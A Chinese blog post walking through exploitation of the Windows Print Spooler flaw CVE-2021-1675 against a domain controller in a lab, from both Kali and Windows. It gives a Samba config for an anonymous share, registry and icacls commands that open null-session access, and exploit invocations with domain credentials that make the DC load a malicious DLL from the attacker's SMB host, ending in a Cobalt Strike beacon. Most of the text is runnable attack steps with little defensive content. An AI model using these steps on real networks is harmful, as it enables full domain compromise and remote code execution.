本文已参与「新人创作礼」活动,一起开启掘金创作之路。
0x01 简介
Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。
环境准备
-
一个普通权限的域账户
-
目标开启Spooler服务
-
创建的smb服务允许匿名访问,即目标可以直接获取到文件
DC WindowsServer 2016 Standard
windows smba服务器:win10
linux smba服务器:kali
0x02 linux下攻击手法
在linux环境下,使用smbd服务可以很方便的开启匿名的samba服务器。
首先使用yum或者apt安装samba,安装完成之后修改**/etc/samba/smb.conf**文件为以下配置。
[global]
workgroup = WORKGROUP
server string = Samba Server
netbios name = MYSERVER
log file = /var/log/samba/log.%m
max log size = 50
security = user
map to guest = Bad User
[smb]
comment = Template Directories
browseable = yes
writeable = yes
path = /tmp/
guest ok = yes
其中[smb]为访问该服务器共享文件夹的名称,path为samba服务器共享的目录。
修改完成之后使用命令service smbd start开启smba服务器。
使用脚本CVE-2021-1675.py执行以下命令
python3 CVE-2021-1675.py hack.com/user1:User@hack.com@192.168.28.191 '\\192.168.28.190\smb\artifact.dll'
当出现Exploit Completed关键字的时候即为攻击成功。
可以看到已经成功上线cs
0x03 windows下攻击手法
这里使用的是三好学生的脚本
还有cube0x0放出的脚本
mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone' REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing
NullSessionPipes REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v
NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t
REG_DWORD /d 0 /f
入口机器执行该脚本
使用脚本CVE-2021-1675.py执行以下命令
python3 CVE-2021-1675.py hack.com/user1:User@hack.com@192.168.28.197 '\\192.168.28.187\smb\artifact.dll'
可以看到已经上线成功了
本文使用 文章同步助手 同步
